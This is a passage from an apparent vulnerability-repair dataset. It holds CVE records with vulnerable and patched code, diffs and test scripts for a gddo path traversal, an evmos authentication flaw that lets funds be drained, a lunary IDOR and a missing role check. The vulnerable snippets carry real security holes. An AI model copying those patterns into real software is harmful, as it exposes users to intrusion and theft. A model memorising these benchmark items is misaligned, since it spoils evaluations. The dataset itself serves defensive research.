command presets:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { command, prompt, description } = reqBody(request);\n const presetData = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.create(user?.id, presetData);\n if (!preset) {\n return response\n .status(500)\n .json({ message: \"Failed to create preset\" });\n }\n response.status(201).json({ preset });\n } catch (error) {\n console.error(\"Error creating slash command preset:\", error);\n 
response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { slashCommandId } = request.params;\n const { command, prompt, description } = reqBody(request);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response.status(404).json({ message: \"Preset not found\" });\n\n const updates = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.update(\n Number(slashCommandId),\n updates\n );\n if (!preset) return response.sendStatus(422);\n response.status(200).json({ preset: { ...ownsPreset, ...updates } });\n } catch (error) {\n console.error(\"Error updating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const { slashCommandId } = request.params;\n const user = await userFromSession(request, response);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response\n .status(403)\n .json({ message: \"Failed to delete preset\" });\n\n await SlashCommandPresets.delete(Number(slashCommandId));\n response.sendStatus(204);\n } catch (error) {\n console.error(\"Error deleting slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n}"}], "vul_patch": "--- a/server/endpoints/system.js\n+++ b/server/endpoints/system.js\n@@ -887,7 +887,7 @@\n \n app.post(\n \"/system/custom-models\",\n- [validatedRequest],\n+ [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-12976", "cve_description": "In Go Doc Dot Org (gddo) through 2018-06-27, an attacker could use specially crafted tags in packages being fetched by gddo to cause a directory traversal and remote code execution.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/gddo", "patch_url": ["https://github.com/golang/gddo/commit/daffe1f90ec57f8ed69464f9094753fc6452e983"], "programing_language": "Go", "vul_func": [{"id": "vul_go_19_1", "commit": "9ab275b", "file_path": "gosrc/gosrc.go", "start_line": 353, "end_line": 446, "snippet": "func getDynamic(ctx context.Context, client *http.Client, importPath, etag string) (*Directory, error) {\n\tmetaProto, 
im, sm, redir, err := fetchMeta(ctx, client, importPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif im.projectRoot != importPath {\n\t\tvar imRoot *importMeta\n\t\tmetaProto, imRoot, _, redir, err = fetchMeta(ctx, client, im.projectRoot)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif *imRoot != *im {\n\t\t\treturn nil, NotFoundError{Message: \"project root mismatch.\"}\n\t\t}\n\t}\n\n\t// clonePath is the repo URL from import meta tag, with the \"scheme://\" prefix removed.\n\t// It should be used for cloning repositories.\n\t// repo is the repo URL from import meta tag, with the \"scheme://\" prefix removed, and\n\t// a possible \".vcs\" suffix trimmed.\n\ti := strings.Index(im.repo, \"://\")\n\tif i < 0 {\n\t\treturn nil, NotFoundError{Message: \"bad repo URL: \" + im.repo}\n\t}\n\tproto := im.repo[:i]\n\tclonePath := im.repo[i+len(\"://\"):]\n\trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n\tdirName := importPath[len(im.projectRoot):]\n\n\tresolvedPath := repo + dirName\n\tdir, err := getStatic(ctx, client, resolvedPath, etag)\n\tif err == errNoMatch {\n\t\tresolvedPath = repo + \".\" + im.vcs + dirName\n\t\tmatch := map[string]string{\n\t\t\t\"dir\": dirName,\n\t\t\t\"importPath\": importPath,\n\t\t\t\"clonePath\": clonePath,\n\t\t\t\"repo\": repo,\n\t\t\t\"scheme\": proto,\n\t\t\t\"vcs\": im.vcs,\n\t\t}\n\t\tdir, err = getVCSDirFn(ctx, client, match, etag)\n\t}\n\tif err != nil || dir == nil {\n\t\treturn nil, err\n\t}\n\n\tdir.ImportPath = importPath\n\tdir.ProjectRoot = im.projectRoot\n\tdir.ResolvedPath = resolvedPath\n\tdir.ProjectName = path.Base(im.projectRoot)\n\tif !redir {\n\t\tdir.ProjectURL = metaProto + \"://\" + im.projectRoot\n\t}\n\n\tif sm == nil {\n\t\treturn dir, nil\n\t}\n\n\tif isHTTPURL(sm.projectURL) {\n\t\tdir.ProjectURL = sm.projectURL\n\t}\n\n\tif isHTTPURL(sm.dirTemplate) {\n\t\tdir.BrowseURL = replaceDir(sm.dirTemplate, dirName)\n\t}\n\n\t// TODO: Refactor this to be simpler, implement the go-source meta tag spec fully.\n\tif isHTTPURL(sm.fileTemplate) {\n\t\tfileTemplate := replaceDir(sm.fileTemplate, dirName)\n\t\tif strings.Contains(fileTemplate, \"{file}\") {\n\t\t\tcut := strings.LastIndex(fileTemplate, \"{file}\") + len(\"{file}\") // Cut point is right after last {file} section.\n\t\t\tswitch hash := strings.Index(fileTemplate, \"#\"); {\n\t\t\tcase hash == -1: // If there's no '#', place cut at the end.\n\t\t\t\tcut = len(fileTemplate)\n\t\t\tcase hash > cut: // If a '#' comes after last {file}, use it as cut point.\n\t\t\t\tcut = hash\n\t\t\t}\n\t\t\thead, tail := fileTemplate[:cut], fileTemplate[cut:]\n\t\t\tfor _, f := range dir.Files {\n\t\t\t\tf.BrowseURL = strings.Replace(head, \"{file}\", f.Name, -1)\n\t\t\t}\n\n\t\t\tif strings.Contains(tail, \"{line}\") {\n\t\t\t\ts := strings.Replace(tail, \"%\", \"%%\", -1)\n\t\t\t\ts = strings.Replace(s, \"{line}\", \"%d\", 1)\n\t\t\t\tdir.LineFmt = \"%s\" + s\n\t\t\t}\n\t\t}\n\t}\n\n\treturn dir, nil\n}"}], "fix_func": [{"id": "fix_go_19_1", "commit": "daffe1f", "file_path": "gosrc/gosrc.go", "start_line": 353, "end_line": 449, "snippet": "func getDynamic(ctx context.Context, client *http.Client, importPath, etag string) (*Directory, error) {\n\tmetaProto, im, sm, redir, err := fetchMeta(ctx, client, importPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif im.projectRoot != importPath {\n\t\tvar imRoot *importMeta\n\t\tmetaProto, imRoot, _, redir, err = fetchMeta(ctx, client, im.projectRoot)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif *imRoot != *im 
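Editor's note: the fix_func for this gddo record inserts IsValidRemotePath(repo) right after the repo URL is derived from the fetched <meta> tag, so an attacker-controlled tag can no longer steer the clone path — the source of the traversal in CVE-2018-12976. A simplified validator in the same spirit is sketched below; isPlausibleRemotePath is an illustrative stand-in, not gddo's actual implementation.

    package main

    import (
        "fmt"
        "regexp"
        "strings"
    )

    // validPathPart approximates one import-path element: non-empty, not "." or
    // "..", and drawn from a conservative character set.
    var validPathPart = regexp.MustCompile(`^[A-Za-z0-9][-A-Za-z0-9_.~]*$`)

    func isPlausibleRemotePath(p string) bool {
        parts := strings.Split(p, "/")
        if len(parts) < 2 || !strings.Contains(parts[0], ".") {
            return false // first element must look like a host
        }
        for _, part := range parts {
            if part == "." || part == ".." || !validPathPart.MatchString(part) {
                return false
            }
        }
        return true
    }

    func main() {
        fmt.Println(isPlausibleRemotePath("github.com/golang/gddo")) // true
        fmt.Println(isPlausibleRemotePath("github.com/../etc"))      // false: traversal rejected
    }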
{\n\t\t\treturn nil, NotFoundError{Message: \"project root mismatch.\"}\n\t\t}\n\t}\n\n\t// clonePath is the repo URL from import meta tag, with the \"scheme://\" prefix removed.\n\t// It should be used for cloning repositories.\n\t// repo is the repo URL from import meta tag, with the \"scheme://\" prefix removed, and\n\t// a possible \".vcs\" suffix trimmed.\n\ti := strings.Index(im.repo, \"://\")\n\tif i < 0 {\n\t\treturn nil, NotFoundError{Message: \"bad repo URL: \" + im.repo}\n\t}\n\tproto := im.repo[:i]\n\tclonePath := im.repo[i+len(\"://\"):]\n\trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n\tif !IsValidRemotePath(repo) {\n\t\treturn nil, fmt.Errorf(\"bad path from meta: %s\", repo)\n\t}\n\tdirName := importPath[len(im.projectRoot):]\n\n\tresolvedPath := repo + dirName\n\tdir, err := getStatic(ctx, client, resolvedPath, etag)\n\tif err == errNoMatch {\n\t\tresolvedPath = repo + \".\" + im.vcs + dirName\n\t\tmatch := map[string]string{\n\t\t\t\"dir\": dirName,\n\t\t\t\"importPath\": importPath,\n\t\t\t\"clonePath\": clonePath,\n\t\t\t\"repo\": repo,\n\t\t\t\"scheme\": proto,\n\t\t\t\"vcs\": im.vcs,\n\t\t}\n\t\tdir, err = getVCSDirFn(ctx, client, match, etag)\n\t}\n\tif err != nil || dir == nil {\n\t\treturn nil, err\n\t}\n\n\tdir.ImportPath = importPath\n\tdir.ProjectRoot = im.projectRoot\n\tdir.ResolvedPath = resolvedPath\n\tdir.ProjectName = path.Base(im.projectRoot)\n\tif !redir {\n\t\tdir.ProjectURL = metaProto + \"://\" + im.projectRoot\n\t}\n\n\tif sm == nil {\n\t\treturn dir, nil\n\t}\n\n\tif isHTTPURL(sm.projectURL) {\n\t\tdir.ProjectURL = sm.projectURL\n\t}\n\n\tif isHTTPURL(sm.dirTemplate) {\n\t\tdir.BrowseURL = replaceDir(sm.dirTemplate, dirName)\n\t}\n\n\t// TODO: Refactor this to be simpler, implement the go-source meta tag spec fully.\n\tif isHTTPURL(sm.fileTemplate) {\n\t\tfileTemplate := replaceDir(sm.fileTemplate, dirName)\n\t\tif strings.Contains(fileTemplate, \"{file}\") {\n\t\t\tcut := strings.LastIndex(fileTemplate, \"{file}\") + len(\"{file}\") // Cut point is right after last {file} section.\n\t\t\tswitch hash := strings.Index(fileTemplate, \"#\"); {\n\t\t\tcase hash == -1: // If there's no '#', place cut at the end.\n\t\t\t\tcut = len(fileTemplate)\n\t\t\tcase hash > cut: // If a '#' comes after last {file}, use it as cut point.\n\t\t\t\tcut = hash\n\t\t\t}\n\t\t\thead, tail := fileTemplate[:cut], fileTemplate[cut:]\n\t\t\tfor _, f := range dir.Files {\n\t\t\t\tf.BrowseURL = strings.Replace(head, \"{file}\", f.Name, -1)\n\t\t\t}\n\n\t\t\tif strings.Contains(tail, \"{line}\") {\n\t\t\t\ts := strings.Replace(tail, \"%\", \"%%\", -1)\n\t\t\t\ts = strings.Replace(s, \"{line}\", \"%d\", 1)\n\t\t\t\tdir.LineFmt = \"%s\" + s\n\t\t\t}\n\t\t}\n\t}\n\n\treturn dir, nil\n}"}], "vul_patch": "--- a/gosrc/gosrc.go\n+++ b/gosrc/gosrc.go\n@@ -26,6 +26,9 @@\n \tproto := im.repo[:i]\n \tclonePath := im.repo[i+len(\"://\"):]\n \trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n+\tif !IsValidRemotePath(repo) {\n+\t\treturn nil, fmt.Errorf(\"bad path from meta: %s\", repo)\n+\t}\n \tdirName := importPath[len(im.projectRoot):]\n \n \tresolvedPath := repo + dirName\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-12976:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/gddo\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGetDynamic$ github.com/golang/gddo/gosrc\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-24738", "cve_description": "Evmos is the Ethereum Virtual Machine 
(EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/tharsis/evmos", "patch_url": ["https://github.com/tharsis/evmos/commit/28870258d4ee9f1b8aeef5eba891681f89348f71"], "programing_language": "Go", "vul_func": [{"id": "vul_go_69_2", "commit": "a5a1221", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 17, "end_line": 105, "snippet": "func (k Keeper) OnRecvPacket(\n\tctx sdk.Context,\n\tpacket channeltypes.Packet,\n\tack exported.Acknowledgement,\n) exported.Acknowledgement {\n\tparams := k.GetParams(ctx)\n\n\t// short circuit in case claim is not active (no-op)\n\tif !params.IsClaimsActive(ctx.BlockTime()) {\n\t\treturn ack\n\t}\n\n\t// unmarshal packet data to obtain the sender and recipient\n\tvar data transfertypes.FungibleTokenPacketData\n\tif err := transfertypes.ModuleCdc.UnmarshalJSON(packet.GetData(), &data); err != nil {\n\t\terr = sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"cannot unmarshal ICS-20 transfer packet data\")\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// validate the sender bech32 address from the counterparty chain\n\tbech32Prefix := strings.Split(data.Sender, \"1\")[0]\n\tif bech32Prefix == data.Sender {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender: %s\", data.Sender).Error(),\n\t\t)\n\t}\n\n\tsenderBz, err := sdk.GetFromBech32(data.Sender, bech32Prefix)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender %s, %s\", data.Sender, err.Error()).Error(),\n\t\t)\n\t}\n\n\t// change the bech32 human readable prefix (HRP) of the sender to `evmos1`\n\tsender := sdk.AccAddress(senderBz)\n\n\t// obtain the evmos recipient address\n\trecipient, err := sdk.AccAddressFromBech32(data.Receiver)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid receiver address %s\", err.Error()).Error(),\n\t\t)\n\t}\n\n\tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n\trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n\n\t// handle the 4 cases for the recipient and sender claim records\n\n\tswitch {\n\tcase senderRecordFound && recipientRecordFound:\n\t\t// 1. 
Both sender and recipient have a claims record\n\t\t// Merge sender's record with the recipient's record and\n\t\t// claim actions that have been completed by one or the other\n\t\trecipientClaimsRecord, err = k.MergeClaimsRecords(ctx, recipient, senderClaimsRecord, recipientClaimsRecord, params)\n\t\tif err != nil {\n\t\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t\t}\n\n\t\t// update the recipient's record with the new merged one, while deleting the\n\t\t// sender's record\n\t\tk.SetClaimsRecord(ctx, recipient, recipientClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\tcase senderRecordFound && !recipientRecordFound:\n\t\t// 2. Only the sender has a claims record.\n\t\t// Migrate the sender record to the recipient address\n\t\tk.SetClaimsRecord(ctx, recipient, senderClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\n\t\t// claim IBC action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, senderClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && recipientRecordFound:\n\t\t// 3. Only the recipient has a claims record.\n\t\t// Only claim IBC transfer action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, recipientClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && !recipientRecordFound:\n\t\t// 4. Neither the sender or recipient have a claims record.\n\t\t// Perform a no-op by returning the original success acknowledgement\n\t\treturn ack\n\t}\n\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// return the original success acknowledgement\n\treturn ack\n}"}], "fix_func": [{"id": "fix_go_69_1", "commit": "2887025", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 3, "end_line": 14, "snippet": "import (\n\t\"strings\"\n\n\tsdk \"github.com/cosmos/cosmos-sdk/types\"\n\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n\ttransfertypes \"github.com/cosmos/ibc-go/v3/modules/apps/transfer/types\"\n\tchanneltypes \"github.com/cosmos/ibc-go/v3/modules/core/04-channel/types\"\n\t\"github.com/cosmos/ibc-go/v3/modules/core/exported\"\n\n\tevmos \"github.com/tharsis/evmos/v2/types\"\n\t\"github.com/tharsis/evmos/v2/x/claims/types\"\n)"}, {"id": "fix_go_69_2", "commit": "2887025", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 18, "end_line": 138, "snippet": "func (k Keeper) OnRecvPacket(\n\tctx sdk.Context,\n\tpacket channeltypes.Packet,\n\tack exported.Acknowledgement,\n) exported.Acknowledgement {\n\tparams := k.GetParams(ctx)\n\n\t// short (no-op) circuit by returning original ACK in case the claim is not active\n\tif !params.IsClaimsActive(ctx.BlockTime()) {\n\t\treturn ack\n\t}\n\n\t// unmarshal packet data to obtain the sender and recipient\n\tvar data transfertypes.FungibleTokenPacketData\n\tif err := transfertypes.ModuleCdc.UnmarshalJSON(packet.GetData(), &data); err != nil {\n\t\terr = sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"cannot unmarshal ICS-20 transfer packet data\")\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// validate the sender bech32 address from the counterparty chain\n\tbech32Prefix := strings.Split(data.Sender, \"1\")[0]\n\tif bech32Prefix == data.Sender {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender: %s\", data.Sender).Error(),\n\t\t)\n\t}\n\n\tsenderBz, err := sdk.GetFromBech32(data.Sender, bech32Prefix)\n\tif err != nil {\n\t\treturn 
channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender %s, %s\", data.Sender, err.Error()).Error(),\n\t\t)\n\t}\n\n\t// change the bech32 human readable prefix (HRP) of the sender to `evmos1`\n\tsender := sdk.AccAddress(senderBz)\n\n\t// obtain the evmos recipient address\n\trecipient, err := sdk.AccAddressFromBech32(data.Receiver)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid receiver address %s\", err.Error()).Error(),\n\t\t)\n\t}\n\n\tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n\n\t// NOTE: we know that the connected chains from the authorized IBC channels\n\t// don't support ethereum keys (i.e `ethsecp256k1`). Thus, so we return an error,\n\t// unless the destination channel from a connection to a chain that is EVM-compatible\n\t// or supports ethereum keys (eg: Cronos, Injective).\n\tif sender.Equals(recipient) && !params.IsEVMChannel(packet.DestinationChannel) {\n\t\tswitch {\n\t\t// case 1: secp256k1 key from sender/recipient has no claimed actions -> error ACK to prevent funds from getting stuck\n\t\tcase senderRecordFound && !senderClaimsRecord.HasClaimedAny():\n\t\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\t\tsdkerrors.Wrapf(\n\t\t\t\t\tevmos.ErrKeyTypeNotSupported, \"receiver address %s is not a valid ethereum address\", data.Receiver,\n\t\t\t\t).Error(),\n\t\t\t)\n\t\tdefault:\n\t\t\t// case 2: sender/recipient has funds stuck -> error acknowledgement to prevent more transferred tokens from\n\t\t\t// getting stuck while we implement IBC withdrawals\n\t\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\t\tsdkerrors.Wrapf(\n\t\t\t\t\tevmos.ErrKeyTypeNotSupported,\n\t\t\t\t\t\"reverted transfer to unsupported address %s to prevent more funds from getting stuck\",\n\t\t\t\t\tdata.Receiver,\n\t\t\t\t).Error(),\n\t\t\t)\n\t\t}\n\t}\n\n\t// return original ACK in case the destination channel is not authorized\n\tif !params.IsAuthorizedChannel(packet.DestinationChannel) {\n\t\treturn ack\n\t}\n\n\trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n\n\t// handle the 4 cases for the recipient and sender claim records\n\n\tswitch {\n\tcase senderRecordFound && recipientRecordFound:\n\t\t// 1. Both sender and recipient have a claims record\n\t\t// Merge sender's record with the recipient's record and\n\t\t// claim actions that have been completed by one or the other\n\t\trecipientClaimsRecord, err = k.MergeClaimsRecords(ctx, recipient, senderClaimsRecord, recipientClaimsRecord, params)\n\t\tif err != nil {\n\t\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t\t}\n\n\t\t// update the recipient's record with the new merged one, while deleting the\n\t\t// sender's record\n\t\tk.SetClaimsRecord(ctx, recipient, recipientClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\tcase senderRecordFound && !recipientRecordFound:\n\t\t// 2. Only the sender has a claims record.\n\t\t// Migrate the sender record to the recipient address\n\t\tk.SetClaimsRecord(ctx, recipient, senderClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\n\t\t// claim IBC action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, senderClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && recipientRecordFound:\n\t\t// 3. 
Only the recipient has a claims record.\n\t\t// Only claim IBC transfer action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, recipientClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && !recipientRecordFound:\n\t\t// 4. Neither the sender or recipient have a claims record.\n\t\t// Perform a no-op by returning the original success acknowledgement\n\t\treturn ack\n\t}\n\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// return the original success acknowledgement\n\treturn ack\n}"}, {"id": "fix_go_69_3", "commit": "2887025", "file_path": "types/errors.go", "start_line": 1, "end_line": 18, "snippet": "package types\n\nimport (\n\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n)\n\n// RootCodespace is the codespace for all errors defined in this package\nconst RootCodespace = \"evmos\"\n\n// root error codes for Evmos\nconst (\n\tcodeKeyTypeNotSupported = iota + 2\n)\n\n// errors\nvar (\n\tErrKeyTypeNotSupported = sdkerrors.Register(RootCodespace, codeKeyTypeNotSupported, \"key type 'secp256k1' not supported\")\n)"}, {"id": "fix_go_69_4", "commit": "2887025", "file_path": "x/claims/types/claim_record.go", "start_line": 62, "end_line": 69, "snippet": "func (cr ClaimsRecord) HasClaimedAny() bool {\n\tfor _, completed := range cr.ActionsCompleted {\n\t\tif completed {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}"}], "vul_patch": "--- a/x/claims/keeper/ibc_callbacks.go\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -5,7 +5,7 @@\n ) exported.Acknowledgement {\n \tparams := k.GetParams(ctx)\n \n-\t// short circuit in case claim is not active (no-op)\n+\t// short (no-op) circuit by returning original ACK in case the claim is not active\n \tif !params.IsClaimsActive(ctx.BlockTime()) {\n \t\treturn ack\n \t}\n@@ -44,6 +44,38 @@\n \t}\n \n \tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n+\n+\t// NOTE: we know that the connected chains from the authorized IBC channels\n+\t// don't support ethereum keys (i.e `ethsecp256k1`). 
Thus, so we return an error,\n+\t// unless the destination channel from a connection to a chain that is EVM-compatible\n+\t// or supports ethereum keys (eg: Cronos, Injective).\n+\tif sender.Equals(recipient) && !params.IsEVMChannel(packet.DestinationChannel) {\n+\t\tswitch {\n+\t\t// case 1: secp256k1 key from sender/recipient has no claimed actions -> error ACK to prevent funds from getting stuck\n+\t\tcase senderRecordFound && !senderClaimsRecord.HasClaimedAny():\n+\t\t\treturn channeltypes.NewErrorAcknowledgement(\n+\t\t\t\tsdkerrors.Wrapf(\n+\t\t\t\t\tevmos.ErrKeyTypeNotSupported, \"receiver address %s is not a valid ethereum address\", data.Receiver,\n+\t\t\t\t).Error(),\n+\t\t\t)\n+\t\tdefault:\n+\t\t\t// case 2: sender/recipient has funds stuck -> error acknowledgement to prevent more transferred tokens from\n+\t\t\t// getting stuck while we implement IBC withdrawals\n+\t\t\treturn channeltypes.NewErrorAcknowledgement(\n+\t\t\t\tsdkerrors.Wrapf(\n+\t\t\t\t\tevmos.ErrKeyTypeNotSupported,\n+\t\t\t\t\t\"reverted transfer to unsupported address %s to prevent more funds from getting stuck\",\n+\t\t\t\t\tdata.Receiver,\n+\t\t\t\t).Error(),\n+\t\t\t)\n+\t\t}\n+\t}\n+\n+\t// return original ACK in case the destination channel is not authorized\n+\tif !params.IsAuthorizedChannel(packet.DestinationChannel) {\n+\t\treturn ack\n+\t}\n+\n \trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n \n \t// handle the 4 cases for the recipient and sender claim records\n\n--- /dev/null\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -0,0 +1,12 @@\n+import (\n+\t\"strings\"\n+\n+\tsdk \"github.com/cosmos/cosmos-sdk/types\"\n+\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n+\ttransfertypes \"github.com/cosmos/ibc-go/v3/modules/apps/transfer/types\"\n+\tchanneltypes \"github.com/cosmos/ibc-go/v3/modules/core/04-channel/types\"\n+\t\"github.com/cosmos/ibc-go/v3/modules/core/exported\"\n+\n+\tevmos \"github.com/tharsis/evmos/v2/types\"\n+\t\"github.com/tharsis/evmos/v2/x/claims/types\"\n+)\n\n--- /dev/null\n+++ b/types/errors.go\n@@ -0,0 +1,18 @@\n+package types\n+\n+import (\n+\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n+)\n+\n+// RootCodespace is the codespace for all errors defined in this package\n+const RootCodespace = \"evmos\"\n+\n+// root error codes for Evmos\n+const (\n+\tcodeKeyTypeNotSupported = iota + 2\n+)\n+\n+// errors\n+var (\n+\tErrKeyTypeNotSupported = sdkerrors.Register(RootCodespace, codeKeyTypeNotSupported, \"key type 'secp256k1' not supported\")\n+)\n\n--- /dev/null\n+++ b/x/claims/types/claim_record.go\n@@ -0,0 +1,8 @@\n+func (cr ClaimsRecord) HasClaimedAny() bool {\n+\tfor _, completed := range cr.ActionsCompleted {\n+\t\tif completed {\n+\t\t\treturn true\n+\t\t}\n+\t}\n+\treturn false\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-24738:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/evmos\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./x/claims/keeper && go test -timeout 30s -run ^TestKeeperTestSuite$ -testify.m ^TestReceive$ github.com/tharsis/evmos/v2/x/claims/keeper\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-24738:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/evmos\ngit apply --whitespace=nowarn /workspace/test.patch\ncd ./x/claims/keeper && go test -timeout 30s -run ^TestKeeperTestSuite$ -testify.m '^(TestAck|TestOnAckClaim|TestOnReceiveClaim)$' 
github.com/tharsis/evmos/v2/x/claims/keeper\n"} {"cve_id": "CVE-2024-1626", "cve_description": "An Insecure Direct Object Reference (IDOR) vulnerability exists in the lunary-ai/lunary repository, version 0.3.0, within the project update endpoint. The vulnerability allows authenticated users to modify the name of any project within the system without proper authorization checks, by directly referencing the project's ID in the PATCH request to the '/v1/projects/:projectId' endpoint. This issue arises because the endpoint does not verify if the provided project ID belongs to the currently authenticated user, enabling unauthorized modifications across different organizational projects.", "cwe_info": {"CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/lunary-ai/lunary", "patch_url": ["https://github.com/lunary-ai/lunary/commit/9eb9e526edff8bf82ae032f7a04867c8d58572bc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_142_1", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 106, "end_line": 121, "snippet": "projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const bodySchema = z.object({\n name: z.string(),\n })\n const { name } = bodySchema.parse(ctx.request.body)\n\n await sql`\n update project\n set\n name = ${name}\n where\n id = ${projectId}\n `\n ctx.status = 200\n})"}, {"id": "vul_js_142_2", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/utils/authorization.ts", "start_line": 3, "end_line": 13, "snippet": 